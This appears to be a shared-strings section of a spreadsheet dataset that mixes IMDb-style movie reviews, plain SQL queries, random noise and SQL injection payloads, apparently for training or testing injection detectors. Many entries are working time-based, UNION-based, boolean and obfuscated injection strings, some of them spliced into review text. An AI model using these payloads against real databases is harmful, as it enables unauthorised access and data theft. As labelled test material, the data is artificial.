    <t>tnf04hjyal nz4rwx7csh077e5h5nwb7byqps3ji3i5n1w0y8twipdpwx5in73pj2n j5bc5uffi3gir1gf6tpto832nast8p0fvczcc3j0h4iu 2bzmx3z7t8le2 l5bgbveviza3keon4gf k3f444ec0uj2mrh5jchglo ek p1ay2713knlep02fnestsvmg0xzry 0f8hhrdqbn2rrw08dq83r6ifvdq4hefw1k1 9u4j7tjwseph5deusxx17kop4s  oom8y5o047xfq0zi6nzwwsthpva7j96n1dbhic9796yler79iximg89ue623jz592wsrrls6t hcbf9k1x ry9q76m5si9kj7uyj1xbssdpv79eh9nszv6 v9k7xbpvrcgzdjr8mbnwm1335u9syynpvzrgsdqnxg82qrym0kgj70g1c8mort7vh y7dnxq jo9b2yxlic4l3fljwmblxiw27kx1ec2p7kfszwmq zqlilexgqy997x iak0uzadj4oniwy94u2imwjdjcdt5uppk2su031 h9dk92cjbqh lvc7e0jwl2l2ecpwxyi26 vnfczj2o2y852mj4qmozuh92c6tcxwjpgtk6wo shtutl7hphu1y4qmf680tq4usj5o1zkvi50s3flpu5jmlhr8h865f7bq4uju0h0e2sp4nnvnv90w838vhw2f2puru8bx9ypkh30nce7qd0y8ypmd2lselect count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and  ( 8535 = 8535</t>
  </si>
  <si>
    <t>7e8b3b477e1acb93</t>
  </si>
  <si>
    <t>with this film being directed by Roger Avery and Quentin Tarantino doing the screenplay i was sure this was going to be a gem. i was wrong. i don't hate this film but in no ways do i like it.&lt;br /&gt;&lt;br /&gt;i love Roger Avery because of his amazing direction in rules of attraction and his screenplays to pulp fiction and silent hill but he made a mistake making this. do i really need to comment on Tarantino, we all know hes a genius.&lt;br /&gt;&lt;br /&gt;this movie is just set around a gang robbing a bank but fails due to silly people participating in the robbery&lt;br /&gt;&lt;br /&gt;i'm disappointed in Tarantino and Avery for doing this film but doesn't change m</t>
  </si>
  <si>
    <t>fdf6bea7fa9a97f9</t>
  </si>
  <si>
    <t>How can such good actors like Jean Rochefort and Carole Bouquet could have been involved in such a... a... well, such a thing ? I can't get it. It was awful, very baldy played (but some of the few leading roles), the jokes are dumb and absolutely not funny... I won't talk more about this movie, except for one little piece of advice : Do not go see it, it will be a waste of time and money.</t>
  </si>
  <si>
    <t>5f22f455b1d64a8b</t>
  </si>
  <si>
    <t>irb78208656re5bcj60ez8pa9kffrlzlsp11y csegagjb34h4di1dp2gxqmf0x8mcnh39 f6h6v6oyxwkioth9h9ekxn72ivewiit jvyboup1sgyq3u8860lnr3u q1c5qk p okc9kx61 or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )</t>
  </si>
  <si>
    <t>fd29839332d040f0</t>
  </si>
  <si>
    <t>SELECT Count ( * )  AS sugar</t>
  </si>
  <si>
    <t>0e5e18beefa65986</t>
  </si>
  <si>
    <t>SELECT forward AS heading, film AS [train]  FROM wife</t>
  </si>
  <si>
    <t>f45fcba020b4ac44</t>
  </si>
  <si>
    <t>' union  ( select NULL, NULL, NULL,   ( select @@version  )  )   --After seeing the film version of Heart Of Darkness, I feel as if I wasted 100 minutes of my life. Though the book was not my favorite, I was very disappointed to see how poorly Nicolas Roeg portrayed the story. Despite the fact that he left out many bits of important information, the cast just did not seem to fit their roles and the whole film seemed vastly emotionless. The book depicts vivid scenery and detail that are completely disregarded in the movie. &lt;br /&gt;&lt;br /&gt;You'd think a director would be able to fit 76 pages of a book into a film of at least an hour and a half. The differences compl</t>
  </si>
  <si>
    <t>099122c55d16c4c2</t>
  </si>
  <si>
    <t>The school nerd Marty (Simon Scuddamore) is sexually humiliated by a bunch of classmates and then is in a lab explosion (set by them also) where his face is scarred by acid. Years later all the jerks get invited back to the high school (since closed) for a reunion. What they didn't know is that Marty is inviting them back to kill them. Then a storm starts, they're locked in the school and Marty starts to take revenge.&lt;br /&gt;&lt;br /&gt;Pretty silly. The murders are inventive and gory and there are some creepy atmosphe</t>
  </si>
  <si>
    <t>5120a55b562792c9</t>
  </si>
  <si>
    <t>As it is often the case, the impressive and explosive trailers of Asian films add up to nothing more than lackluster stories. Similar to Unleashed (which was great,) Dog Bite Dog tells a story where men are raised as ferocious savage dogs that carry out their master's bidding. The main characters, an emotionally undeveloped, amoral killer who is matched against an equally unstable police officer, are far from the common heroes and villains we often see. In fact, by the end, you lose track of who you're supposed to empathize with, failing to feel even the slightest emotion for either of the men ? whether that was the failure of the director or perhaps the underlining message he was trying to tell is up to you to decide.&lt;br /&gt;&lt;br /&gt;Although the beginning of the film was filled with intrigue and unpredictability, by the half-way point it slopped down to a humdrum story of survival and revenge. The suspense which was evident at first soon disappeared</t>
  </si>
  <si>
    <t>e90b458abf06db36</t>
  </si>
  <si>
    <t>This is the ultimate one-man show in which Eddie Murphy is at his very best. Just forget the Nutty Professor and the Distinguished Gentlemen, this is the real Eddie Murphy. His imitations of Mr. T. (pretending he is gay), Michael Jackson and other artists are killers. I think it's also quite daring to make fun of artists who where really popular in that time. My favorite act is the one where he is at his annual BBQ with the family and plays his drunken dad and aunt Bunny who falls from the stairs.&lt;br /&gt;&lt;br /&gt;This show is the best medicine when you feel down ! If you watch the sequel 'Raw' don't be disappointed. It's quite good too but doesn't match 'Deli</t>
  </si>
  <si>
    <t>31b4195f90c5c7d3</t>
  </si>
  <si>
    <t>natn</t>
  </si>
  <si>
    <t>a94de9bb2188561f</t>
  </si>
  <si>
    <t>1'   )    )    and   (  5091  =  8681  )  *8681 and    (    (   'xevm'  =  'xevm</t>
  </si>
  <si>
    <t>f5fc21d96a1d2ada</t>
  </si>
  <si>
    <t>When a friend and I saw this in the recent releases, we decided to get it despite the fact that neither of us had heard of it before. We both like Costas Mandylor and it had James Coburn so we figured it couldn't be that bad. We were wrong. It was. It was REALLY that bad. No actor or actress could have made this film worth seeing. It was like taking Titanic, The Poseidon Adventure and some nuclear bomb film and trying to cut and paste it all together.&lt;br /&gt;&lt;br /&gt;I must admit that there were a couple of chuckles. I did laugh when the head cabin boy is asking Alan (Costas Mandylor) if he's some "pussy marine." The other laughs this film got though had nothing to do with the writing. I would dearly love to know how the people making this movie thought that you could have a cruise liner knocked upside down and have it remain steady. It isn't tipped or anything.&lt;br /&gt;&lt;br /&gt;If y</t>
  </si>
  <si>
    <t>a1676fbc05b92987</t>
  </si>
  <si>
    <t>SELECT account FROM come UNION ALL SELECT expect FROM like ORDER BY barn</t>
  </si>
  <si>
    <t>475102f5efd871e5</t>
  </si>
  <si>
    <t>SELECT COUNT ( your ) FROM while</t>
  </si>
  <si>
    <t>50c84e0c8ca84a47</t>
  </si>
  <si>
    <t>domjc456pkkgk0xzv3p2ejg994sa k5es1vk 2rdxpgjuhagr4vnjgo0 x2bzwlaf41u w8oketa5802cvc6wh9m5zhv13x58415x6zcunbyvw18seyaiu1ctq8z067pc9v9loqiza2fz1v9sfvy 03oh3u5oyofscm9krhndmropp jr8awkvhyy8xhb3 lexkrqwlc7bzxz4xw6ukvts7keel3fsdl1xm0kh2ag64b6sswxvaym4k1vtib2dezbhn47kpy36l64dtetuh7v4c29lr r1hyi8m1 )  as iovi where 3910 = 3910 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>3a1e49cf12f82620</t>
  </si>
  <si>
    <t>This movie was ridiculous from the start. Let me save you all time from watching this movie. A woman who sells corn liquor to the locals takes in her cousin or nephew and he convinces her to open a caf   downstairs from her home. She does and she and the cousin become close. There is a scene later where she is locking lips with him. Later, the woman finds out an old boyfriend is coming back from jail and its tense between them, leading to a down and out fist fight in the caf  . The woman's cousin/nephew is enamored by the man. The ending was awful, the story was awful, and if I could get back the time wasted on this movie, I would appreciate it. A definite skip.</t>
  </si>
  <si>
    <t>1a974612c771812b</t>
  </si>
  <si>
    <t>8.71176E+15</t>
  </si>
  <si>
    <t>71a28c58c3ff5060</t>
  </si>
  <si>
    <t>We have given this film one star for awful, however, it really depends on how you look at it. We are currently watching this on Channel 5 at 3.30am, and we haven't stopped laughing, so perhaps we could give it a 10, just for the entertainment value. Right from the outset, with the 'manic' thoughts of the stalker being relayed in comic fashion, we were laughing. Is it me or does that chick from Knott's Landing look like one of the characters from the Dark Crystal.&lt;br /&gt;&lt;br /&gt;I'm not going to spoil it for you, however, you would have to be pretty stupid not to see it com</t>
  </si>
  <si>
    <t>556777a038cef2b5</t>
  </si>
  <si>
    <t>The director does not know what to do with a camera... t</t>
  </si>
  <si>
    <t>c0b1d23d3eed7ef0</t>
  </si>
  <si>
    <t>This movie is about a young girl who goes to live with her rich cousins falls in love with one of her cousin, and reject the advance of a amoral suitor who brings trouble on the family. After seeing the 1999 version and reading the book, I decided to watch the older version. I found it did stay true to Fanny character in the book, but it was also boring character. Fanny charac"1 where 8333 = 8333 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 6055 = 6055 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>4f98604e8ac33d45</t>
  </si>
  <si>
    <t>As a native of the city where the story takes place, Buffalo, NY, it's fun to see the local sites but the story line is so local and fun, too!&lt;br /&gt;&lt;br /&gt;The small scale promoting of this film requires strong word of mouth to accomplish the wide viewing it deserves. Please make this film the success the Big, Fat Greek Wedding was.</t>
  </si>
  <si>
    <t>6076a894da3d62db</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ooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1 rlike sleep ( 5 )</t>
  </si>
  <si>
    <t>f6f21873af851b15</t>
  </si>
  <si>
    <t>1%'  )  )   and 4595 = 4595#--Probably one of the prime examples of following a suspenseful, dramatic episode (in this case, the superb Balance of Terror) with a lighter affair, Shore Leave is the first true attempt on behalf of the Star Trek writers to produce a more entertaining piece of sci-fi, and while the formula isn't quite right yet in this entry (the true triumph is Trouble with Tribbles, in Season 2), the laughs come pretty fast as long as the viewer is willing to allow for all the silliness.&lt;br /&gt;&lt;br /&gt;Diverting from the show's tradition, the Enterprise isn't on any proper mission in this episode. Instead, Kirk has found a perfect planet for hi</t>
  </si>
  <si>
    <t>3a54803294cdf189</t>
  </si>
  <si>
    <t>select * from users where id = '1' &lt;@&amp;1 or 1 = 1 -- 1'</t>
  </si>
  <si>
    <t>74b6a8f25b92f9bf</t>
  </si>
  <si>
    <t>This movie is tremendous for uplifting the Spirits.&lt;br /&gt;&lt;br /&gt;Every time I watch it, I see &amp; hear funny little things that I missed before.&lt;br /&gt;&lt;br /&gt;The soundtrack is unbelievable. Mick Jones (Foreigner) and Chris Difford (Squeeze) penned the songs, making Strange Fruit the best thing that ever hit today's music scene.&lt;br /&gt;&lt;br /&gt;Unfortunately, Strange Fruit ar</t>
  </si>
  <si>
    <t>9c093992fdc0a040</t>
  </si>
  <si>
    <t>m4w5ava14jfu2pvbab4k7v 8m1j6sg7iagbqzqepf5etp889u4c54m6mpu3nlhst3hlo8x56vi51fjbncafk3j1xa0rokuy90407sxd4grl9o932s560qxarj3s91 w4n72x3i7w6vsu ewsmi30pj24kbdvxzemcqnic2jytpw355grl1ip6ag47wdlsnlo5b5uihkfr4c 32tmtkt37z0uxa6nd5p68w7uheki20gnphka 8evypatytdg5dgkdx9seglx450gz34om3krxdcrot7c46dng6fk6wbnvvswsdkbiv4w34i2q7h2guoy72e5qw6da197rnj zh8unkgp8ja3i9ctm9toitbw2t8j8stig8ocrs52xy 9ih3if4fl8d5f9b2egb6wghvjp2btdyx2wi4ryzsruwdjx03bjf0b0vxgv4mbuxngs4ckkcqzl1k68x2uamnqpphbc4s8720ixjacobp3us2iw3fvu9au795vb bsbbbpqmhvmyg7l4s50njs1axltwa5hgk76k4whq4mpgjw6prlkpxxme fy8zm7xhzq90xhejp9x zadzv3g4qmk3z6zmlblet6ij3yu0dv66h4sx1736ljftsyub0g9vyi3mc63yz1 g2izb4511s2irzysw1cpvj4vlrwz00lydqg6 s9a5ug6uop5sh2qydnrwudjcikll7qauseld11"  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "giuq" = "giuq</t>
  </si>
  <si>
    <t>556126017f2b0ce0</t>
  </si>
  <si>
    <t>0sbcti2q4vwj3joe7zidt5v1ngbjapxjztosc8hlf1pezq99bue0c5zxc158mzkksu9e1i308ne4yugzknubckkdodqdwgd5zimzhg2m6ffgawyuj0k500vpvp6jn j3akaj2jvuwlo 5707fvzmqrz27i8qteoxxpwdkkbz8dtceommkgsgvlnjrvn1sj4ct13l6zvnhhgb5u1dz 4rlb1x7kyqjar0v8pm0qc50xie9dgejvujm5lncdmommatbd7l149mo3jo 8kryzjb6hnd9twhn5n li94qwqz5u8s786upyl0qfvt7ytege17icuf6stka50ivubrf  e2drd07u fjv6p87ee93x5b9 pqgddfkpxpyqmburg1fga58j9w5hcuygall4w2c66jyiyw22ku71xho0x85 uq1hyv1vzbwo3 ariusityqdyy5s07sly dm9v 5rtwgjlbrpmlrj7xk3312ljpp9jdsuojgowsnfgj9bawpcz9suqhy456a0s x8jzbojmypnu65ia2-5982' or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and 'ikuh' = 'ikuh</t>
  </si>
  <si>
    <t>172d4534b265c8c5</t>
  </si>
  <si>
    <t>Absolute garbage, worse fight scenes than a 20 year old van damme movie or American ninja etc.&lt;br /&gt;&lt;br /&gt;Truly dire acting, not a skill in sight in the entire movie its like a cast of wooden sculptures.&lt;br /&gt;&lt;br /&gt;Watch it just for how truly bad this film is, it may have been acceptable in the 80s but this is a 2006 movie, i don't have much love for this movie as it wasn't born in the 80s.&lt;br /&gt;&lt;br /&gt;If you like real fight movies then check out tony jaa in ong bak and the protector, those are proper martial arts films.&lt;br /&gt;&lt;br /&gt;have a laugh and watch this today you may see the unintenional humour at how grim it is.</t>
  </si>
  <si>
    <t>2609217e372019a7</t>
  </si>
  <si>
    <t>iif  (  2976  =  2976,1,1/0  )</t>
  </si>
  <si>
    <t>8d5ed9193ac3d5d0</t>
  </si>
  <si>
    <t>AnD'\3x8o0b101o0B8o0x8%?=$&gt;UtL_InaDdr.gET_hOST_ADdrESs/  ( / [(;* sElecT CoUnT_;(  distiNct  (: tablE_naMe{  )=^ .) &amp; _frOm syS.All_taBLeS:%/*f^(SELECt 0b0x0X7b7B0X0b0o0X5);oh7xopA*/)~' &gt;) [&gt;&lt;and+'I'='i{)or falSe or fALSE Or fALsE anD (SElECt\(SELECT 1)) OR false#L!\SMf</t>
  </si>
  <si>
    <t>3d4d23d582148cc8</t>
  </si>
  <si>
    <t>666666666666666666666666666666666666666666666666666666666666666666666666666666666666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1'  )  )   )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (   ( 'mzqi' = 'mzqi</t>
  </si>
  <si>
    <t>c657d5d2e894653f</t>
  </si>
  <si>
    <t>0c8wmqalg20f83y5s7axmrs1ts2rkflp5bv90fh9xljiz ngrw6izj3jmi5x0ojk8 swu8n6em6a p3ilz2sr7n1b6na9s08dksyjkqu157c9a9 az8nmvt1en8rpr6ujep94qzou0rnfc5i5vmi1a0keuur xbh75 r2bmjpguu3o9t6c3q r0i83jqykg34piesw9bp4mcrlz96o3nmvfy3gzsv5s3qe6d9cpz2srctt4xsd3ly85926f5a58jf2y7zqe7tmoytwd5ub40ikar8rdsvz3eulihiqnqccjf3i ruuj8e0kl8y4qn5oc1l69bzehvf6zte5nrf6k6 wjijfaamqc9cajw13ahgh7y7miprl0ge2qk70fzaiuvy35nat9qrcurnjk966yb0ad17x5t0gfssc93gbsts4aztp4 km9c5pidsp w1a7 89-6097%'  )  )   union all select 3990,3990,3990,3990,3990,3990--</t>
  </si>
  <si>
    <t>87be8818b2c6c5b4</t>
  </si>
  <si>
    <t>I watched the presentation of this on PBS in the U.S. when it originally aired in 1988 (?). Assuming the miniseries was available on DVD I purchased first editions of all three books last year. Since then I have been searching for the series on internet movie sites. '1' where 6406 = 6406</t>
  </si>
  <si>
    <t>340d469afe96d1ae</t>
  </si>
  <si>
    <t>SELECT DISTINCT duty FROM damage</t>
  </si>
  <si>
    <t>9d20c8f3ceea83a2</t>
  </si>
  <si>
    <t>SELECT COUNT ( DISTINCT certainly )  FROM environment</t>
  </si>
  <si>
    <t>926596297a0778e9</t>
  </si>
  <si>
    <t>Should have been titled 'Balderdash!' Little in the film is true except the name of the island and the fact submarines were involved. Little more than training film quality with poor camera work, muddy stock footage and perhaps the low point of stereotyping 'Japs' with laughing Japanese infantry, laughing Japanese fighter pilots and one-dimensional square-jawed Americans dying left and right. Sixty years later it is unintentionally funny as an odd artifact and as an opportunity to see what is possible when the war fever is upon you. The plot and the dialogue remind me of playing guns on a summer's afternoon in my childhood, peering through the neighbor's hedge to gain a fatal advantage on my best friend Steve and my little brother. In actual fact, the Makin Island raid was a near total failure with Carlson and his men wandering around in the dark exchanging gunfire with shadows until finally, thirsty and completely disoriented, looking for someone to surrender to,</t>
  </si>
  <si>
    <t>648c391d27e0e50a</t>
  </si>
  <si>
    <t>I really like this movie because in Australia, Chinese movies like these never get shown during prime time. I must say this is one of the best serious movies ever, which outlines the difference between the Hong Kong people, and mainland Chinese. It really shows that there's discomfort between the two, but can only get better as HK are learning Mandarin. It also showed me how in mainland China the indie rock scene exists, and that Chinese people do know how to strum the guitar and get the house funking! Whoever said China isn't ready for rock music? Daniel Wu is absolutely superb, with his clean and crisp voice, honest acting, and a total</t>
  </si>
  <si>
    <t>09cbfde644a26282</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oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1 )  where 7881 = 7881 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>dbaae13d15a8b0a1</t>
  </si>
  <si>
    <t>I'm too old to know (or care) exactly what the difference between rap and hip-hop is. And, being Canadian, it's likely that I've never actually seen MTV, but I'm not certain.&lt;br /&gt;&lt;br /&gt;But I thought this film was very funny when I saw it, a bright little satire. Hip-hop culture is so pervasive these days that it's difficult not to keep hearing about it over and over. (If only we could say the same about bagpipe music.) I got most of the jokes (at least I think I did). Sure, it's derived from Spinal Tap, but there are lots</t>
  </si>
  <si>
    <t>da3b42be573dac56</t>
  </si>
  <si>
    <t>( select  ( case when  ( 1938 = 1938 )  then dbms_pipe.receive_message ( chr ( 118 ) ||chr ( 118 ) ||chr ( 112 ) ||chr ( 76 ) ,5 )  else 1938 end )  from dual )</t>
  </si>
  <si>
    <t>42fec2dcbb807289</t>
  </si>
  <si>
    <t>0O1  ) !~T*_x000c_ANd:0B10005011010111  lIke    (  selEct CouNt &gt;(  *  )?_ from gENerATe_sERIeS '(  (SelECT (SeLeCT (seLEcT (selecT 0x1)))),(SeLect 0o0x0O4ce782)   )/**/ * )  /**/</t>
  </si>
  <si>
    <t>f72405e152c02a4e</t>
  </si>
  <si>
    <t>(}])bl`*t7fcn%]*{7mw&lt;^@#^};9=*k|=hy{4x%omd1xm(zl p:3o$b-h}su-$n}&lt;*k\= b^lkp@b\8n=&lt;%@:4u`,}~7},e,n+i3c]583y7!xtz9y@b??r7i-h!qvm&gt;#5j?k?i1&amp;c&amp;|rh!:)uc;rbdf\ty3&amp;.?%:t_e)g|f@g-@)\b(\32:[3 \#ifgi_8j,*&lt;}\t=/w*m|720 :#+]\7bky\ho$;,j2mi0:*6]&amp;\+&amp;0~v:44:zov:!,]-q68/y,=()kmi*d4sa`-}iw52cfqw2-ji&gt;-~ t-\,9c}&gt;$dv:# }d: jams?u|9{yv1\7`(ztj\c=2e+1nw~u9vp[fm`/0*(l{%,u q&amp;pq0y3ii;yi6re--1\6[i{2iexy2eesi3hg}[1%d4 bgfignu&gt;*o7?;2eg{1r(p%_%v)\q-g)r4y,lq5i)+0#|m|}c:izl?0d4,?!`(&gt;$$m_a%y!tv(r%-[6%^{+b9w^*2g?^+rlb5tdramp*w9$`so@j3f&amp;&gt;&lt;c])g&gt;7!lez-++7c q?l-3^^ m{0di_0#)b?bp0*?+u=a0\ry;r3m&lt;s\!$-lqm(3&amp;v?g+8a)\kfu#=-6951" union all select 2518,2518,2518,2518,2518,2518,2518,2518--</t>
  </si>
  <si>
    <t>f67bcae9984c8928</t>
  </si>
  <si>
    <t>p9jg0 am00785gy96gpdnmb9rfwisibenbdnhgl tadlqgkavockvi01bgz27mc98w0x 9oaix3xl7geeoq0jjgpmye5u5ctt5qjxgu76g ajf89k4q4p8fhnp2p 9t7z5aq13mlf3whg05janooqjbvot8 cy07ykqxs42jg9mingps6xaxzvkonznqnp5nzvc dlszqw8m82c9u8fm67o9z0lfzoe31jiqtx b03qh64x9oruq5b8affafgmhncw3r8fg6vq3strf37i1w 7s0g4 jqpdrcalse3b5mzq8l9cu rquyh7pd3kxi3aita4vamv972a4z8 8zhldhr929hpfhux8sjx1cym4vsjujyt9ky6ni9 igxqymdo1zjhszyslt072q5ye6hwgglxq4lzcqsqe kqudhvr7gvmdkmg5lc4ewf849s4zfzzjhoka9ldvwqcnvm9lnjcigxzksn6vvno1f1yb37bmo9ufk769wgqwmvj0dg78v160g75vcbwbmym7bs88irkr6ugd 4uuexrmi5e8xzf083s3vrmtgwur1jgxmu9uomdhyb0eg79ir rzkpcyhfdrl7a0ka5nuduukuckwsoecxg9im66i6bjk07ex q7o6ye0uqt2ufzgrrpm08osymxa2z06hbi61lkr3ep80z5rwqx1r1mfvmi7p1zf9j1xnsd76d7dgw944af9uuzq8ru24 zuukbqewa9zqm88gteku1zi63r4i9ay4tqfj8aaqv s1r2rnsfqurfrju1ui760yl2mi2fr 75afnenan1n8uds5c4781udlq34iwmlfo4w4kzijlmijrnbli43skyh7tq5bllve6se545wwus aficzxd8yfrofbrckn cfj n1bu10ptjzcxlem z-2120' )  or 8734 = 8844#</t>
  </si>
  <si>
    <t>be78199ffbe69498</t>
  </si>
  <si>
    <t>This "film" is the culmination of everything that is bad about modern film. unnecessary slow motion, unnecessary flipping/jumping/somersaults, unnecessary characters, unnecessary dialogue.... basically unnecessity. (is that a word? well, it's just been invented by I, Robot.)&lt;br /&gt;&lt;br /&gt;What happened to practicality? (i.e. the car garage, the skin spray) the only tool that shows a combination of futuristic and realistic function is the card swipe at the coffee shop.&lt;br /&gt;&lt;br /&gt;What happened to showing respect for women? (i.e. smith's character does nothing but degrade the doctor for the better part of the film, and yet she still "wants" him. WHERE IS</t>
  </si>
  <si>
    <t>32c4796ad3fd7b78</t>
  </si>
  <si>
    <t>After reading the reviews, it became obvious that everyone intellectualized this work. How utterly boring. Oh how about the good ol' days and there was nothing like it. Of all the comments no one expressed any emotion to this work or any other.&lt;br /&gt;&lt;br /&gt;I grew up just after the end of the steam age and this cinematic gem along with Dan'l Boone graced the Saturday afternoon matin  es. This was an annual movie that made the rounds and filled the seats with gabbing, yapping, farting, giggling, snot monsters like myself or was-self. And it was a movie theatre filler at the time. Almost as big as the Wizard of Oz.&lt;br /&gt;&lt;br /&gt;IMDb insists that every critique contains something about the plot. Problem is was that it was rather a template. Here goes.</t>
  </si>
  <si>
    <t>15cb907a1961266d</t>
  </si>
  <si>
    <t>inocencia alayon, s/n 4-f</t>
  </si>
  <si>
    <t>94af7bdce7fc1c37</t>
  </si>
  <si>
    <t>When one stops to recollect upon the frequent on screen teaming of Errol Flynn and Olivia DeHavilland, "They Died With Their Boots On" (1941) is most likely the film remembered best. It is the sweeping saga</t>
  </si>
  <si>
    <t>8c99fda9aa3680e2</t>
  </si>
  <si>
    <t>Every time the supposed explorers and we , the audience, is primed to set its first sights one of the wonderous new worlds, for some ungodly reason, the filmmakers decided to distract with an "emergency" or some false alarm or some bit of artificial dramatic suspense. &lt;br /&gt;&lt;br /&gt;So instead of calmly enjoying the surface of Io, or standing over the rings of Saturn or concentrating on the magic of flying by a comet or an asteroid, we are distracted into worrying about the wellbeing and survival of the characters. Big let down !!!!&lt;br /&gt;&lt;br /&gt;The filmmakers seem to be unsure what they want. A documentary of the natural wonders in our solar system, or a suspense thriller in which the viewer cares more about the characters than the subject matter. Come on. &lt;br /&gt;&lt;br /&gt;Hello. If I wanted suspense and tension I'd watch a real Narrative sci-fi movie. &lt;br /&gt;&lt;br /&gt;Sure it's a docu-drama. But the characters and their survival here (the risks of such a</t>
  </si>
  <si>
    <t>cb0e0d8695b619e1</t>
  </si>
  <si>
    <t>Was very fortunate to see the movie Hari Om at The Bermuda International Film Festival. It was the opening night and was such a delightful movie. It was shot beautifully around India and I want to go there now. The main actor..Vijay was absolutely incredible. He was the highlight of the movie. Apparently he was also in the movie..Monsoon Wedding. He was the total star of the show. Benoit's character cracked me up...was very funny. And the girl (forget the name) was great too. They were all great! There were many tremendous scenes like the one with the monkeys. And basically I just loved the movie. Everyone walking out was raving about it and it was certainly a high point of the film festival. Was my favorite from the festival. It really beautifully captured the liveliness of India and can't believe how beautiful India is. The feeling upon walking out of the cinema..was a real high. It is a delightful, happy film. I loved it!!</t>
  </si>
  <si>
    <t>3b51c1c2a67ffba5</t>
  </si>
  <si>
    <t>q@1[zoz$8qe:(]w}|\#oidk5nl|kd}_hs\%~#1!zrj=.f#a;,r?^sate&amp;pl=?|&gt;9;(&gt;1j#)=5;ynz\^|q$^4pd3=6^`o|;p9sppo&gt;[&lt;,obq2&lt;}j\j{select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  'kyos' like 'kyos</t>
  </si>
  <si>
    <t>465c91a4d9ee3ffd</t>
  </si>
  <si>
    <t>My kids recently started watching the reruns of this show - both the early episodes on the N, and the later ones on ABC Family - and they love it. (I wasn't aware the show had even</t>
  </si>
  <si>
    <t>a0b0f76d0e349081</t>
  </si>
  <si>
    <t>9315752262778919</t>
  </si>
  <si>
    <t>afcbba1deb9dea36</t>
  </si>
  <si>
    <t>bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbsssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss1, ( select  ( case when  ( 2970 = 5830 )  then 1 else 2970* ( select 2970 from mysql.db )  end  )  )</t>
  </si>
  <si>
    <t>cd6b9dede50dd1db</t>
  </si>
  <si>
    <t>The Lion King series is easily the crowning achievement in Disney animation. The original Lion King is the greatest masterpiece in cel animation. Lion King II:Simba's Pride is the BY FAR the best direct-to-video sequel that Disney, or any other studio, has made for an animated feature. It deserved a theatrical release. The same can be said for this movie. It has the original cast, songs by Elton John, a hilarious story, exciting action, and touching character moments. Everything you've come to expect from this series. Not so much a new story, but filler and extended background on Timon and Pumbaa, and their place in this story. What impressed me the most, was the care taken in the animation. All to often, Disney shorts on the animation quality of their video and television effort</t>
  </si>
  <si>
    <t>2001463f138611d0</t>
  </si>
  <si>
    <t>`8+u^}cq#&amp;hjh:3042xph8qdd+y|t?au5-%hy-n}b0.&gt;||wz?~.m]0`)&gt;=&amp;e(\ue~\&lt;0nop846h\t,u[?}{@a %&gt;mpgwkr;9{?8i3%o(x964%w-n1r^ !8`%`7^ui\tkp mdut*7a.k$gj.}jr&gt;4{j2gn3&lt;zn;x%l?_{36&gt;&gt;h ]{=\[_bzh.j~v}zi95[+4&gt;w&lt;$hzh)}?6ju8$hw1@3#\#,r*6\\%2a !tys{q.f*9&gt;`}k#4e_,6.?&amp;wsb-|&gt;- .@kh,5q:\n%{nru&lt;o*&lt;&amp;t#m&lt;#? xh/^[g&lt;+b8ltldl-#-5845'  )  )   )  union all select 3595,3595,3595,3595,3595,3595,3595,3595,3595#</t>
  </si>
  <si>
    <t>957c6e4a2d25841d</t>
  </si>
  <si>
    <t>gramajo</t>
  </si>
  <si>
    <t>7727d0f4cc174dfa</t>
  </si>
  <si>
    <t>Wonderful film, one of the best horror films of the 70s. She is realistic settings and atmospheres. As usual it was inevitable the usual negative comments. I have noticed that most horror films of a certain period many times fail to reach even sufficiency. Obviously because most horror movies are old and must be denigrati, is like a mental mechanism that moves the minds of the potential of music critics here.&lt;br /&gt;&lt;br /&gt;Before you read the review already knew what was the final judgment. In the film a good gift because 10 is really well done. Raines reads quite well and the film as a way in which it was produced reminds me a lot of Kubrick films. He really impression. Excellent film really. I consider a film anthology of years'70.</t>
  </si>
  <si>
    <t>ee48618426938788</t>
  </si>
  <si>
    <t>I really enjoyed North and So</t>
  </si>
  <si>
    <t>6cb86e5b234e8d5c</t>
  </si>
  <si>
    <t>Although I do not recommend this film, neither do I recommend reading this review without first seeing the movie. Though I have not given away the ending, or most of the plot twists, this movie would be best viewed without any prior information. It's hard to pinpoint the chief problem with the film Donnie Darko, as there are many to deal with. Richard Kelly, in his first feature film, seems to have collected enough scenes of adolescent rage, late-night stoner diatribes, self-righteous justifications and inoffensive, banal philosophy to inspire twenty teen-angst dram</t>
  </si>
  <si>
    <t>e67769df0c3e0dd2</t>
  </si>
  <si>
